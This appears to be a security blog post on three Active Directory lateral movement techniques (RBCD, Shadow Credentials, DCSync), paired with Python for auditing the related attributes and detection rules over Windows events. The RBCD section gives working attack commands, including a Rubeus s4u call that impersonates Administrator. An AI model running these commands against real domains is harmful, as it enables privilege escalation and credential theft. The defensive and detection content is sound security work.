Introduction
Credential Guard and the Protected Users group have made Pass-the-Hash much harder in well-administered Active Directory environments: Credential Guard keeps NTLM secrets out of reach of LSASS-dumping tools, and members of Protected Users cannot authenticate with NTLM at all. Neither control helps against an attacker who already holds write access to the right directory attributes or replication rights on the domain. This post covers three less widely known lateral movement techniques that abuse such rights and remain effective in hardened environments.
1. Resource-Based Constrained Delegation (RBCD)
The msDS-AllowedToActOnBehalfOfOtherIdentity attribute of a computer object holds a security descriptor listing the principals allowed to delegate to that computer. An attacker who can write the attribute (GenericWrite, WriteDACL or WriteProperty on the target computer object is enough) adds a principal they control that has an SPN, typically a machine account they created themselves under the default MachineAccountQuota of 10, and then chains S4U2Self and S4U2Proxy to obtain a service ticket to the target host as an arbitrary user. Accounts marked "sensitive and cannot be delegated" and members of Protected Users cannot be impersonated this way, so the technique is limited to users outside those protections.
# Run with an account that has write access to the TARGET computer object;
# ATTACKER is a machine account under the attacker's control.
Set-ADComputer -Identity TARGET -PrincipalsAllowedToDelegateToAccount (Get-ADComputer ATTACKER)
# Request a service ticket to TARGET as Administrator (S4U2Self, then S4U2Proxy) and inject it.
Rubeus.exe s4u /user:ATTACKER$ /rc4:<hash> /impersonateuser:Administrator /msdsspn:cifs/TARGET /ptt
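The value written by the Set-ADComputer call above is a self-relative security descriptor whose DACL contains one ACCESS_ALLOWED ACE per delegating principal. The following Python is an added example, not code from the original post or from any tool it mentions: it builds that descriptor for a given SID (the same layout impacket's rbcd.py writes) and decodes an existing value back into SIDs, which is the check a defender runs over msDS-AllowedToActOnBehalfOfOtherIdentity across all computer objects. The SID, the BUILTIN\Administrators owner and the full-control mask are illustrative choices; no directory access is performed.

```python
"""Build and decode the msDS-AllowedToActOnBehalfOfOtherIdentity descriptor (added example)."""
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION_DS = 0x04
FULL_CONTROL = 0x000F01FF           # mask used by the common RBCD tooling
BUILTIN_ADMINS = "S-1-5-32-544"     # owner/group placed in the descriptor
# Illustrative SID of an attacker-controlled machine account (constructed).
ATTACKER_SID = "S-1-5-21-1004336348-1177238915-682003330-1105"


def sid_to_bytes(sid: str) -> bytes:
    """Encode S-1-<authority>-<sub>... into the binary SID layout."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID string: %r" % sid)
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    out = struct.pack("<BB", 1, len(subs)) + authority.to_bytes(6, "big")
    return out + b"".join(struct.pack("<I", s) for s in subs)


def bytes_to_sid(buf: bytes, offset: int = 0):
    """Decode a binary SID at offset; returns (sid_string, byte_length)."""
    rev, count = struct.unpack_from("<BB", buf, offset)
    authority = int.from_bytes(buf[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<" + "I" * count, buf, offset + 8)
    text = "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs)
    return text, 8 + 4 * count


def build_rbcd_descriptor(allowed_sids):
    """Self-relative SD: 20-byte header, owner SID, group SID, DACL with one ACE per SID."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL) + sid_b
    acl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINS)
    group = owner
    owner_off = 20
    group_off = owner_off + len(owner)
    dacl_off = group_off + len(group)
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         owner_off, group_off, 0, dacl_off)   # SACL offset 0 = absent
    return header + owner + group + acl


def allowed_principals(sd: bytes):
    """Return the SIDs granted by ACCESS_ALLOWED ACEs in the descriptor's DACL."""
    _rev, _sbz1, control, _o_owner, _o_group, _o_sacl, o_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if not control & SE_DACL_PRESENT or o_dacl == 0:
        return []
    _acl_rev, _sbz, _acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", sd, o_dacl)
    pos = o_dacl + 8
    sids = []
    for _ in range(ace_count):
        ace_type, _flags, ace_size, _mask = struct.unpack_from("<BBHI", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(bytes_to_sid(sd, pos + 8)[0])
        pos += ace_size
    return sids


if __name__ == "__main__":
    sd = build_rbcd_descriptor([ATTACKER_SID])
    print(len(sd), "bytes:", sd.hex())
    print("allowed to act on behalf of other identity:", allowed_principals(sd))
```

To audit a live domain, read the attribute for every computer object (for example Get-ADComputer -Filter * -Properties msDS-AllowedToActOnBehalfOfOtherIdentity, or an LDAP search) and feed the raw bytes to allowed_principals; any SID that is not a service account documented as needing constrained delegation to that host deserves a look.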
2. Shadow Credentials
msDS-KeyCredentialLink stores the public keys a user or computer may use for certificate-based (PKINIT) Kerberos authentication, the mechanism behind Windows Hello for Business. An attacker with write access to the attribute on a target object appends a KeyCredential for a key pair they generated, then authenticates as that principal with PKINIT using the matching private key. This yields a TGT, and from it the account's NTLM hash via the user-to-user trick, without knowing or resetting the current password, so no password-change event is raised and the legitimate owner keeps working. It requires the Windows Server 2016 schema (the attribute must exist) and at least one domain controller holding a certificate usable for PKINIT, which is normally the case wherever AD CS is deployed.
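The attribute is multi-valued DN-Binary: each value is "B:<hex length>:<hex>:<owner DN>" wrapping a KEY_CREDENTIAL_LINK_BLOB, which is a version DWORD followed by length-prefixed entries (KeyID, KeyMaterial, KeyUsage, KeySource, DeviceId, creation time and so on). The following Python is an added example, not code from the original post or from tools such as Whisker: it encodes a minimal blob around constructed key material and decodes a stored value back into the fields a defender wants to see (which device and when a key was added). The key material, device GUID and timestamp are constructed placeholders; a real entry carries an RSA public key and the optional KeyHash and CustomKeyInformation entries that this example leaves out.

```python
"""Encode/decode msDS-KeyCredentialLink values (added example, constructed data)."""
import hashlib
import struct
import uuid
from datetime import datetime, timedelta, timezone

KCL_VERSION = 0x200
# Entry identifiers of KEY_CREDENTIAL_LINK_ENTRY (MS-ADTS 2.2.20.2)
ID_KEY_ID, ID_KEY_HASH, ID_KEY_MATERIAL, ID_KEY_USAGE, ID_KEY_SOURCE = 1, 2, 3, 4, 5
ID_DEVICE_ID, ID_CUSTOM_KEY_INFO, ID_LAST_LOGON, ID_CREATION_TIME = 6, 7, 8, 9
KEY_USAGE_NGC = 0x01      # Next Generation Credential (Windows Hello / PKINIT)
KEY_SOURCE_AD = 0x00      # key stored in Active Directory
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)

# Constructed sample inputs (not a real key or device).
KEY_MATERIAL = bytes(range(32))
DEVICE_ID = uuid.UUID("12345678-1234-5678-1234-567812345678")
CREATED = datetime(2024, 5, 1, 12, 0, tzinfo=timezone.utc)
OWNER_DN = "CN=WEB01,OU=Servers,DC=corp,DC=local"


def to_filetime(dt):
    """datetime -> Windows FILETIME (100 ns ticks since 1601-01-01 UTC), integer math only."""
    td = dt - EPOCH_1601
    return ((td.days * 86400 + td.seconds) * 1_000_000 + td.microseconds) * 10


def from_filetime(ft):
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def _entry(ident, value):
    """One entry: Length (2 bytes LE), Identifier (1 byte), Value."""
    return struct.pack("<HB", len(value), ident) + value


def build_key_credential(key_material, device_id, created):
    entries = [
        _entry(ID_KEY_ID, hashlib.sha256(key_material).digest()),
        _entry(ID_KEY_MATERIAL, key_material),
        _entry(ID_KEY_USAGE, bytes([KEY_USAGE_NGC])),
        _entry(ID_KEY_SOURCE, bytes([KEY_SOURCE_AD])),
        _entry(ID_DEVICE_ID, device_id.bytes_le),
        _entry(ID_CREATION_TIME, struct.pack("<Q", to_filetime(created))),
    ]
    return struct.pack("<I", KCL_VERSION) + b"".join(entries)


def to_dn_binary(blob, owner_dn):
    hexblob = blob.hex().upper()
    return f"B:{len(hexblob)}:{hexblob}:{owner_dn}"


def parse_key_credential_link(value):
    """Decode one attribute value into the fields worth reviewing."""
    tag, hexlen, hexblob, owner_dn = value.split(":", 3)
    if tag != "B" or int(hexlen) != len(hexblob):
        raise ValueError("not a DN-Binary value")
    blob = bytes.fromhex(hexblob)
    (version,) = struct.unpack_from("<I", blob, 0)
    pos, entries = 4, {}
    while pos < len(blob):
        length, ident = struct.unpack_from("<HB", blob, pos)
        entries[ident] = blob[pos + 3:pos + 3 + length]
        pos += 3 + length
    return {
        "owner_dn": owner_dn,
        "version": version,
        "key_id": entries[ID_KEY_ID].hex(),
        "key_usage": entries[ID_KEY_USAGE][0],
        "key_material_len": len(entries[ID_KEY_MATERIAL]),
        "device_id": str(uuid.UUID(bytes_le=entries[ID_DEVICE_ID])),
        "created": from_filetime(struct.unpack("<Q", entries[ID_CREATION_TIME])[0]),
    }


def example_value():
    return to_dn_binary(build_key_credential(KEY_MATERIAL, DEVICE_ID, CREATED), OWNER_DN)


if __name__ == "__main__":
    for k, v in parse_key_credential_link(example_value()).items():
        print(f"{k}: {v}")
```

Run over the real attribute, the decoded DeviceId and creation time are what you compare against your Windows Hello enrolment records: a key on a server or service account, or a key created outside any enrolment window, is the Shadow Credentials footprint.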
3. DCSync via Replication Rights
Any principal holding the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All control access rights on the domain naming context can ask a domain controller to replicate objects over DRSUAPI (GetNCChanges) exactly as another DC would, and receives every account's password hashes, including krbtgt. DS-Replication-Get-Changes-In-Filtered-Set is needed in addition for attributes in the filtered attribute set. By default only domain controller accounts and the Administrators, Domain Admins and Enterprise Admins groups hold these rights; any other principal granted them, whether by a mistaken delegation or by an attacker with WriteDACL on the domain object, can run mimikatz lsadump::dcsync or impacket secretsdump without ever touching a DC's file system or LSASS.
Detection
Enable Audit Directory Service Access and collect Event ID 4662 records whose Properties field contains the replication control access right GUIDs 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes), 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes-All) and 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set); alert when the subject is not a domain controller computer account. Enable Audit Directory Service Changes with a SACL on user and computer objects so that Event ID 5136 records writes to msDS-AllowedToActOnBehalfOfOtherIdentity and msDS-KeyCredentialLink. On the Kerberos side, a 4769 ticket request with a populated Transited Services field is an S4U2Proxy request, and a 4768 TGT request with the certificate issuer and serial fields populated is a PKINIT logon, which stands out for accounts that never use certificates.
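The four checks above as rules over parsed events, as an added example that is not part of the original post. The events are constructed dictionaries whose keys mirror the EventData field names of 4662, 5136, 4769 and 4768 (SubjectUserName, Properties, AttributeLDAPDisplayName, TransitedServices, CertIssuerName and so on); the account names, DN and DC list are made up. Anything producing dictionaries with these field names (a SIEM export, an EVTX parser) can be fed to triage unchanged.

```python
"""Detection rules for DCSync, RBCD / Shadow Credential writes and S4U / PKINIT use (added example)."""
import re

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
SENSITIVE_ATTRIBUTES = {"msDS-AllowedToActOnBehalfOfOtherIdentity", "msDS-KeyCredentialLink"}
GUID_RE = re.compile(r"([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})", re.I)

# Constructed sample events; field names follow the Windows EventData schema.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$",          # normal DC-to-DC replication
     "Properties": "Control Access\r\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\r\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe",           # DCSync from a user account
     "Properties": "Control Access\r\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\r\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 5136, "SubjectUserName": "jdoe", "OperationType": "%%14674",   # value added
     "ObjectDN": "CN=WEB01,OU=Servers,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    {"EventID": 4769, "TargetUserName": "Administrator@CORP.LOCAL", "ServiceName": "WEB01$",
     "TransitedServices": "ATTACKER$@CORP.LOCAL"},         # S4U2Proxy ticket
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "WEB01$",
     "TransitedServices": "-"},                            # ordinary TGS request
    {"EventID": 4768, "TargetUserName": "WEB01$", "CertIssuerName": "corp-DC01-CA",
     "CertSerialNumber": "1A2B3C"},                        # PKINIT for a machine account
]


def triage(events, dc_accounts, pkinit_accounts=frozenset()):
    """Return (event_id, subject, reason) tuples for events matching the rules."""
    dc_accounts = {a.upper() for a in dc_accounts}
    pkinit_accounts = {a.upper() for a in pkinit_accounts}
    alerts = []
    for ev in events:
        eid = ev["EventID"]
        subject = ev.get("SubjectUserName", "")
        if eid == 4662:
            rights = [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(ev.get("Properties", ""))
                      if g.lower() in REPLICATION_RIGHTS]
            if rights and subject.upper() not in dc_accounts:
                alerts.append((4662, subject, "replication rights used by non-DC: " + ", ".join(rights)))
        elif eid == 5136:
            attr = ev.get("AttributeLDAPDisplayName", "")
            if attr in SENSITIVE_ATTRIBUTES:
                alerts.append((5136, subject, f"{attr} modified on {ev.get('ObjectDN', '')}"))
        elif eid == 4769:
            transited = ev.get("TransitedServices", "-")
            if transited not in ("", "-"):
                alerts.append((4769, ev.get("TargetUserName", ""),
                               f"S4U2Proxy ticket for {ev.get('ServiceName', '')} via {transited}"))
        elif eid == 4768:
            target = ev.get("TargetUserName", "")
            if ev.get("CertIssuerName", "") and target.upper() not in pkinit_accounts:
                alerts.append((4768, target, "PKINIT logon by an account not expected to use certificates"))
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS, dc_accounts={"DC01$"}):
        print(alert)
```

The DC allow-list and the PKINIT allow-list are the two places where this needs tuning: Azure AD Connect and some backup agents legitimately hold replication rights, and smart-card users legitimately produce 4768 events with certificate fields, so maintain both lists from configuration rather than learning them from the logs.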